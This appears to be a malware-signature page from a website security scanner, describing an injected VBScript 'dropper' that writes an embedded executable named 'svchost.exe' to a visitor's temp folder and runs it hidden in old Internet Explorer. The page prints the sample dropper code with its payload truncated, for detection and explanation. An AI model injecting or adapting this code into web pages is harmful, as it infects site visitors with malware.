SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.vb_dropper


Malicious VBScript that drops a malicious file to a site visitor's computer and [optionally] executes it.

Such attacks work only in old versions of Internet Explorer. Most modern browsers don't support VBScript by default.

Here's a sample of what used to be one of the most popular VB dropper injection

<SCRIP​T Language=​VBScript><!--
DropFileName = "svchost​.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004...skipped...000000000000000"
Set FSO = CreateObject("Scripting.​FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "" & ​DropFileName
If FSO.FileExists(​DropPath)=False Then
Set FileObj = FSO.CreateTextFile(​DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(​WriteData,i,2)))
End If
Set WSHshell = CreateObject("WScript​.Shell")
WSHshell​.Run DropPath, 0

Affecting: Any web site (no specific target).